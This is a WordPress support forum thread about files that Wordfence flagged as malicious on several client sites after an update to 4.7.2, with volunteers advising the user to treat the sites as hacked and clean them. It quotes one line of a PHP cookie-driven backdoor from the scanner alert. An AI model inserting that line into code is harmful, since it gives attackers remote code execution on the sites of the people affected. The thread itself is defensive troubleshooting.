Support » Fixing WordPress » Malicious File After Updating WordPress to 4.7.2

  • +ES

    (@evelynmsdesigngraphicscom)


    Hello+

    I have updated 6 WordPress sites to 4.7.2 and afterwards I have received the following notice from all of them:

    File appears to be malicious: wp-content/common.php

    I do have WordFence and BlogVault Security on all of these and both platforms are informing me of this issue.

    I find it odd that all sites have this warning after the newest WordPress update. Is anyone else getting this alert?

    I am going through each and fixing them, however I’m wondering if this is a false alarm or what?

    Any advice/guidance about this specific suspicious malicious file and how/why it appeared after updating to WordPress 4.7.2 on ALL sites would be greatly appreciated. Also, is there any additional things I need to do…?

    Thank you.

Viewing 11 replies - 1 through 11 (of 11 total)
  • barnez

    (@pidengmor)

    That file is not a part of the WordPress install or uprade package. I would assume the worst – that the file is malicious and that your hosting account/personal machine/login credentials have been compromised. This is the standard support doc referred to in this case: https://codex.wordpress.org/FAQ_My_site_was_hacked . Then once your site is clean: http://codex.wordpress.org/Hardening_WordPress

    Moderator Steve Stern

    (@sterndata)

    Support Team Volunteer

    if you look at the file, is there any indication where it might come from? Any comments at the top?

    If all your sites are in the same hosting account, a hack of one could easily affect the others.

    +ES

    (@evelynmsdesigngraphicscom)

    Hello+

    @pidengmor (barnez), thank you for clarifying that it really is a malicious file. I do not think “my” hosting account/personal machine/login credentials have been compromised since none of these are on my hosting. All of these are my clients’ websites and each has their own individual accounts, with which ever host provider they prefer. They are not all hosted by the same hosting company. However, ALL got this malicious file AFTER the update to WordPress 4.7.2.

    @sterndata, thank you for that suggestion… There is no indication as to where it might have come from (looking via WordFence), only “This file appears to be installed by a hacker to perform malicious activity”… Also, no – they are NOT on the same hosting account.

    I am removing that file now…I simply find it VERY suspicious that I updated to the WordPress 4.7.2 and THEN ALL were hacked… I’m just wondering about that…?

    Thanks, +ES

    barnez

    (@pidengmor)

    @evelynmsdesigngraphicscom

    As suggested by @sterndata, it would be interesting to see what the file contains. It could be something as innocent as a plugin adding the file. Wordfence may just be flagging it as malicious as it shouldn’t be there. If it has lots of obfuscated code or dodgy links then it’s trouble. Are you able to check?

    +ES

    (@evelynmsdesigngraphicscom)

    Hello+

    I will take a look and see… I will post what I find.

    Thank you.

    +ES

    (@evelynmsdesigngraphicscom)

    Hi+

    Looking at WordFence, the alert says:

    File appears to be malicious: wp-comments-post.php

    Filename: wp-comments-post.php
    File type: Core
    Issue first detected: 4 hours 32 mins ago.
    Severity: Critical
    Status New

    This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);”. The infection type is: Backdoor:PHP/ddksk7.
    **
    However when I go to “see how the file has changed”, it says:

    There are no differences between the original file and the file in the repository.
    **

    So…should I “restore the original version”? Or delete it entirely? (since it is not part of the WordPress install or upgrade package)

    Thank you! +ES

    Moderator Steve Stern

    (@sterndata)

    Support Team Volunteer

    delete it

    Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are two.

    +ES

    (@evelynmsdesigngraphicscom)

    Thank you Steve… I already have WordFence and BlogVault Security on the sites.

    I am in via FTP and looking under “wp-content” which is where WordFence is stating the common.php is located

    wp-content/common.php

    But I do not see that common.php – so it is difficult to delete if I don’t see it via FTP… Any suggestions?

    Thanks!

    +ES

    (@evelynmsdesigngraphicscom)

    Okay, that was not supposed to be a link… just the letters “FTP”

    Moderator Steve Stern

    (@sterndata)

    Support Team Volunteer

    If you have a suspicious file, it’s best to assume there are more.

    Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are two.

    +ES

    (@evelynmsdesigngraphicscom)

    Thank you

Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘Malicious File After Updating WordPress to 4.7.2’ is closed to new replies.